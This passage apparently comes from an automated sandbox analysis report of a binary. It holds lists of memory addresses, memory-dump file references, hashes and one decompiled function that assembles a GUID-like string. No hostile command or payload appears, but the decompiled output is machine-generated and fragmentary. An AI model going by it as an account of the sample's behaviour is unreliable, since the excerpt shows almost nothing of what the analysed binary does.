                                                                                                                                0x10002918
                                                                                                                                0x1000291a
                                                                                                                                0x1000291c
                                                                                                                                0x10002923
                                                                                                                                0x10002931
                                                                                                                                0x10002931
                                                                                                                                0x1000293c
                                                                                                                                0x1000293c
                                                                                                                                0x1000293e
                                                                                                                                0x10002943
                                                                                                                                0x10002955
                                                                                                                                0x10002967
                                                                                                                                0x1000296c
                                                                                                                                0x10002974
                                                                                                                                0x1000297d
                                                                                                                                0x1000297d
                                                                                                                                0x10002989
                                                                                                                                0x1000298e
                                                                                                                                0x10002995
                                                                                                                                0x10002998
                                                                                                                                0x1000299d
                                                                                                                                0x100029a2
                                                                                                                                0x100029b2
                                                                                                                                0x100029b7
                                                                                                                                0x100029c0
                                                                                                                                0x100029c5
                                                                                                                                0x100029c7
                                                                                                                                0x100029d5
                                                                                                                                0x100029dc
                                                                                                                                0x100029de
                                                                                                                                0x100029e5
                                                                                                                                0x100029e7
                                                                                                                                0x100029f0
                                                                                                                                0x100029f2
                                                                                                                                0x100029f4
                                                                                                                                0x100029fb
                                                                                                                                0x100029fd
                                                                                                                                0x10002a04
                                                                                                                                0x10002a06
                                                                                                                                0x10002a0b
                                                                                                                                0x10002a0f
                                                                                                                                0x10002a16
                                                                                                                                0x10002a2a
                                                                                                                                0x10002a2c
                                                                                                                                0x10002a2e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002a4d
                                                                                                                                0x10002a4f
                                                                                                                                0x10002a51
                                                                                                                                0x10002b60
                                                                                                                                0x10002b62
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002b68
                                                                                                                                0x10002a57
                                                                                                                                0x10002a62
                                                                                                                                0x10002a71
                                                                                                                                0x10002a76
                                                                                                                                0x10002a78
                                                                                                                                0x10002a7a
                                                                                                                                0x10002a81
                                                                                                                                0x10002a82
                                                                                                                                0x10002a82
                                                                                                                                0x10002a8b
                                                                                                                                0x10002a8e
                                                                                                                                0x10002a9d
                                                                                                                                0x10002aa0
                                                                                                                                0x10002aa9
                                                                                                                                0x10002ab2
                                                                                                                                0x10002abb
                                                                                                                                0x10002ac0
                                                                                                                                0x10002ac7
                                                                                                                                0x10002acc
                                                                                                                                0x10002ad2
                                                                                                                                0x10002ad2
                                                                                                                                0x10002a90
                                                                                                                                0x10002a99
                                                                                                                                0x10002a9b
                                                                                                                                0x10002af3
                                                                                                                                0x10002af5
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002afb
                                                                                                                                0x10002b04
                                                                                                                                0x10002b0d
                                                                                                                                0x10002b12
                                                                                                                                0x10002b19
                                                                                                                                0x10002b1e
                                                                                                                                0x10002b24
                                                                                                                                0x10002b24
                                                                                                                                0x10002b2d
                                                                                                                                0x10002b39
                                                                                                                                0x10002b45
                                                                                                                                0x10002b51
                                                                                                                                0x00000000
                                                                                                                                0x10002b51
                                                                                                                                0x00000000
                                                                                                                                0x10002a9b
                                                                                                                                0x10002ad7
                                                                                                                                0x10002adb
                                                                                                                                0x10002adb
                                                                                                                                0x10002998
                                                                                                                                0x100028b9
                                                                                                                                0x100027f6
                                                                                                                                0x100027f6
                                                                                                                                0x10002805
                                                                                                                                0x10002809
                                                                                                                                0x1000281a
                                                                                                                                0x1000281a
                                                                                                                                0x1000281c
                                                                                                                                0x10002823
                                                                                                                                0x10002823
                                                                                                                                0x10002823
                                                                                                                                0x10002826
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x1000282b
                                                                                                                                0x100027f6
                                                                                                                                0x100027f6
                                                                                                                                0x10002805
                                                                                                                                0x10002809
                                                                                                                                0x1000281a
                                                                                                                                0x1000281a
                                                                                                                                0x1000281c
                                                                                                                                0x00000000
                                                                                                                                0x1000281c
                                                                                                                                0x100027f6
                                                                                                                                0x1000282d
                                                                                                                                0x10002834
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10002836
                                                                                                                                0x00000000
                                                                                                                                0x10002823
                                                                                                                                0x100027f6

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.326422259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.326385968.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326450075.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326459410.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326469799.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: D$jDj$Y2$[b$|$
                                                                                                                                • API String ID: 0-3050245986
                                                                                                                                • Opcode ID: 3a7486d0a9152435c8e2ce8dfb923c6bc5e18f8bac7796a937da64c5d8b4bbb4
                                                                                                                                • Instruction ID: 84d6ba07eb8596f36070ff54d400f2681934c8a12333da9aebe73e57c4461f7b
                                                                                                                                • Opcode Fuzzy Hash: 3a7486d0a9152435c8e2ce8dfb923c6bc5e18f8bac7796a937da64c5d8b4bbb4
                                                                                                                                • Instruction Fuzzy Hash: 84D19538608385AEF675EB20CC52FAE73D5EF513C0F50481DF6895A09ADF71A945C722
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 83%
                                                                                                                                			E1000C218(void* __ecx, void* __edx) {
                                                                                                                                				char _v28;
                                                                                                                                				char _v33;
                                                                                                                                				char _v38;
                                                                                                                                				char _v43;
                                                                                                                                				void* _t24;
                                                                                                                                				char* _t25;
                                                                                                                                				char _t32;
                                                                                                                                				void* _t33;
                                                                                                                                				void* _t34;
                                                                                                                                				signed int _t38;
                                                                                                                                				char* _t40;
                                                                                                                                
                                                                                                                                				_t40 = (_t38 & 0xfffffff0) - 0x2c;
                                                                                                                                				asm("movq xmm0, [edx]");
                                                                                                                                				_t32 = 0;
                                                                                                                                				 *_t40 = 0x7b;
                                                                                                                                				asm("movq [esp+0x1], xmm0");
                                                                                                                                				_v43 = 0x2d;
                                                                                                                                				do {
                                                                                                                                					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
                                                                                                                                					_t32 = _t32 + 1;
                                                                                                                                				} while (_t32 < 4);
                                                                                                                                				_v38 = 0x2d;
                                                                                                                                				_t33 = 0;
                                                                                                                                				do {
                                                                                                                                					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
                                                                                                                                					_t33 = _t33 + 1;
                                                                                                                                				} while (_t33 < 4);
                                                                                                                                				_v33 = 0x2d;
                                                                                                                                				_t34 = 0;
                                                                                                                                				do {
                                                                                                                                					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
                                                                                                                                					_t34 = _t34 + 1;
                                                                                                                                				} while (_t34 < 4);
                                                                                                                                				_v28 = 0x2d;
                                                                                                                                				_t24 = 0;
                                                                                                                                				do {
                                                                                                                                					asm("movd xmm0, dword [eax+edx+0x14]");
                                                                                                                                					asm("movd [esp+eax+0x19], xmm0");
                                                                                                                                					_t24 = _t24 + 4;
                                                                                                                                				} while (_t24 < 0xc);
                                                                                                                                				_t25 = _t40;
                                                                                                                                				 *((char*)(_t25 + 0x25)) = 0x7d;
                                                                                                                                				 *((char*)(_t25 + 0x26)) = 0;
                                                                                                                                				E1000DFBC(__ecx, _t25, 0);
                                                                                                                                				return __ecx;
                                                                                                                                			}














                                                                                                                                0x1000c21f
                                                                                                                                0x1000c224
                                                                                                                                0x1000c228
                                                                                                                                0x1000c22a
                                                                                                                                0x1000c22e
                                                                                                                                0x1000c234
                                                                                                                                0x1000c239
                                                                                                                                0x1000c23d
                                                                                                                                0x1000c241
                                                                                                                                0x1000c242
                                                                                                                                0x1000c249
                                                                                                                                0x1000c24e
                                                                                                                                0x1000c250
                                                                                                                                0x1000c254
                                                                                                                                0x1000c258
                                                                                                                                0x1000c259
                                                                                                                                0x1000c260
                                                                                                                                0x1000c265
                                                                                                                                0x1000c267
                                                                                                                                0x1000c26b
                                                                                                                                0x1000c26f
                                                                                                                                0x1000c270
                                                                                                                                0x1000c275
                                                                                                                                0x1000c27a
                                                                                                                                0x1000c27c
                                                                                                                                0x1000c27c
                                                                                                                                0x1000c282
                                                                                                                                0x1000c288
                                                                                                                                0x1000c28b
                                                                                                                                0x1000c292
                                                                                                                                0x1000c295
                                                                                                                                0x1000c29b
                                                                                                                                0x1000c2a0
                                                                                                                                0x1000c2ae

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.326422259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.326385968.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326450075.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326459410.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000002.00000002.326469799.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -$-$-$-
                                                                                                                                • API String ID: 0-1033403326
                                                                                                                                • Opcode ID: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
                                                                                                                                • Instruction ID: 6420cdf91b2b9fc5655fa5f82b4c53aa5eb92ddd4154ae73ebf41adf494228f8
                                                                                                                                • Opcode Fuzzy Hash: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
                                                                                                                                • Instruction Fuzzy Hash: C811252091C3C04CE749DB7C548462BFFD08F9A208F1886BEE4DA86B53E525D49683B7
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%